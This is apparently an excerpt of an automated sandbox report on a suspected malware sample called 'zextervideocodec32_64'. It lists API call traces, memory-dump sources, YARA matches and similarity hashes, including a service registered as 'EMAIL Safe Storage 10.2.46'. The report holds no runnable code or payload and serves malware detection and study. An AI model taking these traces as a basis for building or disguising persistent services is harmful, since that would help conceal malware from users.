• RegisterServiceCtrlHandlerA.ADVAPI32(EMAIL Safe Storage 10.2.46,Function_0000235E), ref: 004023C1
• SetServiceStatus.ADVAPI32(0040C408), ref: 00402420
• GetLastError.KERNEL32 ref: 00402422
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
• GetLastError.KERNEL32 ref: 00402450
• SetServiceStatus.ADVAPI32(0040C408), ref: 00402480
• CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
• CloseHandle.KERNEL32 ref: 004024A1
• SetServiceStatus.ADVAPI32(0040C408), ref: 004024CA
Strings
• EMAIL Safe Storage 10.2.46, xrefs: 004023BC
Memory Dump Source
• Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
Similarity
• API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
• String ID: EMAIL Safe Storage 10.2.46
• API String ID: 3346042915-4190116034
• Opcode ID: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
• Instruction ID: b8fe7bda3a7dcfcb82ad829e681adc6a99cb3bee06a9baca5ac2dc3afb04543b
• Opcode Fuzzy Hash: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
• Instruction Fuzzy Hash: E121C570441214EBC2105F16EFE9A267FA8FBD5794711823EE544B22B2CBB90549CFAD
APIs
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BBD
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BD1
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BFD
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C35
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C57
• FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C70
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403C83
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403CC1
Strings
Memory Dump Source
• Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
Similarity
• API ID: EnvironmentStrings$ByteCharFreeMultiWide
• String ID: 4/@
• API String ID: 1823725401-3101945251
• Opcode ID: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
• Instruction ID: a2970ceca2a6c3f976dc545d3d2173026391ae6ff2d108e1c7f08cdddd2a955e
• Opcode Fuzzy Hash: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
• Instruction Fuzzy Hash: AD31F27350C1245EE7202F785DC883B7E9CEA4534A711093FF942F3380EA798E81466D
APIs
• __EH_prolog.LIBCMT ref: 02BC3428
• GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02BC346B
• GetProcAddress.KERNEL32(00000000), ref: 02BC3472
• GetLastError.KERNEL32 ref: 02BC3486
• InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02BC34D7
• RtlEnterCriticalSection.NTDLL(00000018), ref: 02BC34ED
• RtlLeaveCriticalSection.NTDLL(00000018), ref: 02BC3518
Strings
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
• String ID: CancelIoEx$KERNEL32
• API String ID: 2902213904-434325024
• Opcode ID: 5d0c8281ac5d425ce1b10f6cc45feeb2070230bae91507cd8ec7f397f5af6eec
• Instruction ID: 654453049a3b094e0a51ccedb5a409bdf4b09707eed5de98c54978691addb770
• Opcode Fuzzy Hash: 5d0c8281ac5d425ce1b10f6cc45feeb2070230bae91507cd8ec7f397f5af6eec
• Instruction Fuzzy Hash: 8E318FB1900215DFDB11AF68C884AAEBBF9FF48310F1488D9E8169B242DB74D901CFA1
APIs
• LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404381,?,Microsoft Visual C++ Runtime Library,00012010,?,0040858C,?,004085DC,?,?,?,Runtime Error!Program: ), ref: 0040658A
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065A2
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004065B3
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004065C0
Strings
Memory Dump Source
• Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
• API String ID: 2238633743-4044615076
• Opcode ID: 987b992b6f5bbeab899bec9017d6b859524fa9c80776c30a59c8d29f16b735e1
• Instruction ID: 34c45dea863b0ad37b671b2ee6745cf1fa65c172ae9c71c573f5c1b511995102
• Opcode Fuzzy Hash: 987b992b6f5bbeab899bec9017d6b859524fa9c80776c30a59c8d29f16b735e1
• Instruction Fuzzy Hash: FA017571A40201FFCB209FB5BFC492B3AE99B58690306193FB541F2291DE79C815DB68
APIs
• LCMapStringW.KERNEL32(00000000,00000100,00408658,00000001,00000000,00000000,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 00406899
• LCMapStringA.KERNEL32(00000000,00000100,00408654,00000001,00000000,00000000,?,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 004068B5
• LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00406317,?,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 004068FE
• MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 00406936
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406317,00200020,00000000,?,00000000), ref: 0040698E
• LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406317,00200020,00000000,?,00000000), ref: 004069A4
• LCMapStringW.KERNEL32(00000000,?,00406317,00000000,00406317,?,?,00406317,00200020,00000000,?,00000000), ref: 004069D7
• LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406317,00200020,00000000,?,00000000), ref: 00406A3F
Memory Dump Source
• Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
Similarity
• API ID: String$ByteCharMultiWide
• String ID:
• API String ID: 352835431-0
• Opcode ID: e9f64dd7570e4df949ea1626fd4153753d4334a99172a5ae067b945d03b43c58
• Instruction ID: 8dbeb6cb8c932cbdef2775d2a29e2de0fc7c35b208bd80b0a47b5516e3ba15ce
• Opcode Fuzzy Hash: e9f64dd7570e4df949ea1626fd4153753d4334a99172a5ae067b945d03b43c58
• Instruction Fuzzy Hash: 3E518A71500209EBCF219F94CD45AAF7BB5FB49714F12413AF912B12A0C73A8C21DB69
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 004042CA
• GetStdHandle.KERNEL32(000000F4,0040858C,00000000,?,00000000,00000000), ref: 004043A0
• WriteFile.KERNEL32(00000000), ref: 004043A7
Strings
Memory Dump Source
• Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3784150691-4022980321
• Opcode ID: 4bb15c7821e3b7df3b39c29bb8507035fb8a1658cdd6742b24a8a426161d7798
• Instruction ID: ad501088bf1d437e3d5a217a77e101a13ac7783d72fc0021c8d9dd27a33d1b06
• Opcode Fuzzy Hash: 4bb15c7821e3b7df3b39c29bb8507035fb8a1658cdd6742b24a8a426161d7798
• Instruction Fuzzy Hash: 52318772600218AFDF2096608E45FDA736DAF85304F1004BFF944B61D1EA789D458A5D
APIs
• OpenEventA.KERNEL32(00100002,00000000,00000000,C802D0CE), ref: 02BD1690
• CloseHandle.KERNEL32(00000000), ref: 02BD16A5
• ResetEvent.KERNEL32(00000000,C802D0CE), ref: 02BD16AF
• CloseHandle.KERNEL32(00000000,C802D0CE), ref: 02BD16E4
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C802D0CE), ref: 02BD175A
• CloseHandle.KERNEL32(00000000), ref: 02BD176F
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$CreateOpenReset
• String ID:
• API String ID: 1285874450-0
• Opcode ID: 3ef6dd090ad0833c0fbfe804b7e75941e54f372d2c7c1a6e83647bcb5b37d0bf
• Instruction ID: 1a9eab4d2aaebcb3ce77f2d02925a44f63bc80512f9c6ce06b9d18c7b6c69814
• Opcode Fuzzy Hash: 3ef6dd090ad0833c0fbfe804b7e75941e54f372d2c7c1a6e83647bcb5b37d0bf
• Instruction Fuzzy Hash: 91414C74D15348ABDF20CFE9C844BEDBBB8EF05764F144299E818EB280E7319905CBA1
                                                                                                      APIs
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC20AC
                                                                                                      • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02BC20CD
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC20D8
                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 02BC213E
                                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02BC217A
                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 02BC2187
                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02BC21A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                                      • String ID:
                                                                                                      • API String ID: 1171374749-0
                                                                                                      • Opcode ID: 545791888c1100b96177d9fb3803b980554c6b15ab98652451b6578ec992f149
                                                                                                      • Instruction ID: 1f548319ec1cc3a073c7572ad733c8dacda810c243d4a6ee7d1ebb0ab6fd8668
                                                                                                      • Opcode Fuzzy Hash: 545791888c1100b96177d9fb3803b980554c6b15ab98652451b6578ec992f149
                                                                                                      • Instruction Fuzzy Hash: 5A413871504701AFC311DF25D884A6BBBF9FBC8654F100A5EF8AA83251DB30E545DFA1
                                                                                                      APIs
                                                                                                        • Part of subcall function 02BD1EB0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02BD170E,?,?), ref: 02BD1EDF
                                                                                                        • Part of subcall function 02BD1EB0: CloseHandle.KERNEL32(00000000,?,?,02BD170E,?,?), ref: 02BD1EF4
                                                                                                        • Part of subcall function 02BD1EB0: SetEvent.KERNEL32(00000000,02BD170E,?,?), ref: 02BD1F07
                                                                                                      • OpenEventA.KERNEL32(00100002,00000000,00000000,C802D0CE), ref: 02BD1690
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BD16A5
                                                                                                      • ResetEvent.KERNEL32(00000000,C802D0CE), ref: 02BD16AF
                                                                                                      • CloseHandle.KERNEL32(00000000,C802D0CE), ref: 02BD16E4
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02BD1715
                                                                                                        • Part of subcall function 02BD453A: RaiseException.KERNEL32(?,?,02BCFB35,?,?,?,?,?,?,?,02BCFB35,?,02BF0F98,?), ref: 02BD458F
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,C802D0CE), ref: 02BD175A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BD176F
                                                                                                        • Part of subcall function 02BD1BF0: GetCurrentProcessId.KERNEL32(?), ref: 02BD1C49
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,C802D0CE), ref: 02BD177F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227236058-0
                                                                                                      • Opcode ID: 237c2f9773437e5e95d9c27c0ad75658a5f34f6008cf3ef50af9de064fccc0d0
                                                                                                      • Instruction ID: 23e3855400729efe8dff9fa9793e2ce27871eeb74fcdbb0fefc95fce231c0ad6
                                                                                                      • Opcode Fuzzy Hash: 237c2f9773437e5e95d9c27c0ad75658a5f34f6008cf3ef50af9de064fccc0d0
                                                                                                      • Instruction Fuzzy Hash: 7B313975D11309ABDF20DAE89844BEDB7B9EF05364F144299E81CEB290FB319905CB61
                                                                                                      APIs
                                                                                                      • __init_pointers.LIBCMT ref: 02BD5D74
                                                                                                        • Part of subcall function 02BD84E2: RtlEncodePointer.NTDLL(00000000), ref: 02BD84E5
                                                                                                        • Part of subcall function 02BD84E2: __initp_misc_winsig.LIBCMT ref: 02BD8500
                                                                                                        • Part of subcall function 02BD84E2: GetModuleHandleW.KERNEL32(kernel32.dll,?,02BF1598,00000008,00000003,02BF0F7C,?,00000001), ref: 02BD9261
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02BD9275
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02BD9288
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02BD929B
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02BD92AE
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02BD92C1
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02BD92D4
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02BD92E7
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02BD92FA
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02BD930D
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02BD9320
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02BD9333
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02BD9346
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02BD9359
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02BD936C
                                                                                                        • Part of subcall function 02BD84E2: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02BD937F
                                                                                                      • __mtinitlocks.LIBCMT ref: 02BD5D79
                                                                                                      • __mtterm.LIBCMT ref: 02BD5D82
                                                                                                        • Part of subcall function 02BD5DEA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02BD8918
                                                                                                        • Part of subcall function 02BD5DEA: _free.LIBCMT ref: 02BD891F
                                                                                                        • Part of subcall function 02BD5DEA: RtlDeleteCriticalSection.NTDLL(02BF3978), ref: 02BD8941
                                                                                                      • __calloc_crt.LIBCMT ref: 02BD5DA7
                                                                                                      • __initptd.LIBCMT ref: 02BD5DC9
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02BD5DD0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3567560977-0
                                                                                                      • Opcode ID: 185837d606cceeec75aa612c30380b9fba4cd5d89b3a69dfd06b3d9ced4b6c33
                                                                                                      • Instruction ID: 20fd1b4524f28a7ff5b643eee8266f40a3c4db4814f1e9d7b878f577f74c9599
                                                                                                      • Opcode Fuzzy Hash: 185837d606cceeec75aa612c30380b9fba4cd5d89b3a69dfd06b3d9ced4b6c33
                                                                                                      • Instruction Fuzzy Hash: E4F0B4325497122EE67876B97C0DBDA2B86DF01774B600AD9E4A4C60D0FF2094824B60
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02BD3453,00000000), ref: 02BD34BB
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02BD34C2
                                                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 02BD34CE
                                                                                                      • RtlDecodePointer.NTDLL(00000001), ref: 02BD34EB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                      • String ID: RoInitialize$combase.dll
                                                                                                      • API String ID: 3489934621-340411864
                                                                                                      • Opcode ID: da57e8ec307e31e3fa7ca307c691e92e4d00a1004eb37b0297afbb18052a1622
                                                                                                      • Instruction ID: 9640afc1fe359f5d0068815d0a3cb5f5e1aa0903fc81bf2a5d70d63c56093743
                                                                                                      • Opcode Fuzzy Hash: da57e8ec307e31e3fa7ca307c691e92e4d00a1004eb37b0297afbb18052a1622
                                                                                                      • Instruction Fuzzy Hash: A7E09A70ED0340EBEF605FB0EC49F0237A9AB00782F2058A4BA12EB190DFB554A49F11
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02BD3490), ref: 02BD3590
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02BD3597
                                                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 02BD35A2
                                                                                                      • RtlDecodePointer.NTDLL(02BD3490), ref: 02BD35BD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                      • API String ID: 3489934621-2819208100
                                                                                                      • Opcode ID: 9537c77b9b65accb1905a52d13ba6d0474a6c459c294805f0b19c7806b714d33
                                                                                                      • Instruction ID: 8d16eda8f5042ee53230025e28c0d7322441d288a7e57a08989131aff5e95683
                                                                                                      • Opcode Fuzzy Hash: 9537c77b9b65accb1905a52d13ba6d0474a6c459c294805f0b19c7806b714d33
                                                                                                      • Instruction Fuzzy Hash: A0E01A70DC0300EAEE504BB0AD4CB0537A8B710785F204894BA0296165DF755160DB15
                                                                                                      APIs
                                                                                                      • TlsGetValue.KERNEL32(0000002B,C802D0CE,?,?,?,?,00000000,02BE6A98,000000FF,02BD21AA), ref: 02BD1F4A
                                                                                                      • TlsSetValue.KERNEL32(0000002B,02BD21AA,?,?,00000000), ref: 02BD1FB7
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BD1FE1
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 02BD1FE4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: HeapValue$FreeProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1812714009-0
                                                                                                      • Opcode ID: 7bbb60cfc11546a7adf048c8c7cd1246ceec9f25fb75cda1cf4a0fad1970a337
                                                                                                      • Instruction ID: 926fcb5d8417c5084c5761e2f6df2f95b7de4754fd04ce690f1796ae14e03719
                                                                                                      • Opcode Fuzzy Hash: 7bbb60cfc11546a7adf048c8c7cd1246ceec9f25fb75cda1cf4a0fad1970a337
                                                                                                      • Instruction Fuzzy Hash: 9051F371904384DFDB20CF68D444B96BBE5FF48364F4986A9F8199B292E731EC00CB90
                                                                                                      APIs
                                                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 02BE5770
                                                                                                      • __FindPESection.LIBCMT ref: 02BE578A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FindHandlersScopeSectionTableValidate
                                                                                                      • String ID:
                                                                                                      • API String ID: 876702719-0
                                                                                                      • Opcode ID: c47a19ce593951a68aaf5520fedb7321de3b693e9c3c9372bd0cb765f64585ec
                                                                                                      • Instruction ID: 5bb012faa26b018a81f90c930f8dd7c3c2c8d280811867cdcd1f940e18036030
                                                                                                      • Opcode Fuzzy Hash: c47a19ce593951a68aaf5520fedb7321de3b693e9c3c9372bd0cb765f64585ec
                                                                                                      • Instruction Fuzzy Hash: D5A19F75E002158FCF31CF58D9807A9B7B5FB44368F9546E9ED56AB241EB31E802CBA0
                                                                                                      APIs
                                                                                                      • GetStringTypeW.KERNEL32(00000001,00408658,00000001,00000000,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 0040674D
                                                                                                      • GetStringTypeA.KERNEL32(00000000,00000001,00408654,00000001,?,?,00000000,00000000,00000001), ref: 00406767
                                                                                                      • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 0040679B
                                                                                                      • MultiByteToWideChar.KERNEL32(00406317,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 004067D3
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406829
                                                                                                      • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040683B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: StringType$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852931651-0
                                                                                                      • Opcode ID: 6d8eb81ee64157f72203894b93785b9b85560a11f4962ec6ebb452b13d20bf59
                                                                                                      • Instruction ID: 7abba187aa9a424c0dbe6a0d425d95b5373609879485ba3de4d3a8f21a169ece
                                                                                                      • Opcode Fuzzy Hash: 6d8eb81ee64157f72203894b93785b9b85560a11f4962ec6ebb452b13d20bf59
                                                                                                      • Instruction Fuzzy Hash: 11418D72901209EFCF209F94CD85EAF3B79FB04754F11453AF912F2290D73989608B99
                                                                                                      APIs
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BC1CB1
                                                                                                      • CloseHandle.KERNEL32(?), ref: 02BC1CBA
                                                                                                      • InterlockedExchangeAdd.KERNEL32(02BF7274,00000000), ref: 02BC1CC6
                                                                                                      • TerminateThread.KERNEL32(?,00000000), ref: 02BC1CD4
                                                                                                      • QueueUserAPC.KERNEL32(02BC1E7C,?,00000000), ref: 02BC1CE1
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02BC1CEC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 1946104331-0
                                                                                                      • Opcode ID: a52adc102918783837787ab224311d20c34b22d27f33bcfa0c710ac0037feede
                                                                                                      • Instruction ID: 7f90db23f3321d5df3b55d6c76e79d411907705b7e161959475991486c524a25
                                                                                                      • Opcode Fuzzy Hash: a52adc102918783837787ab224311d20c34b22d27f33bcfa0c710ac0037feede
                                                                                                      • Instruction Fuzzy Hash: 83F08C31950204FFDB205B9AED0DC5BFBBCEB85720B10469DF66AD6191DF60A910EB60
                                                                                                      APIs
                                                                                                      • GetVersionExA.KERNEL32 ref: 00403ECB
                                                                                                      • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403F00
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403F60
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                      • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                      • API String ID: 1385375860-4131005785
                                                                                                      • Opcode ID: 24e6f3bd4125583b3bbf56e9767beae157ffe726f3734666c8e193c81b681956
                                                                                                      • Instruction ID: b9728f854654bad712525c43123df79641ae2587965f18a3091eb02ea7af310c
                                                                                                      • Opcode Fuzzy Hash: 24e6f3bd4125583b3bbf56e9767beae157ffe726f3734666c8e193c81b681956
                                                                                                      • Instruction Fuzzy Hash: 42312771D002896DEB319A309C45BDA7F7C9B12309F2400FBE545F52C2D6398F8A8718
                                                                                                      APIs
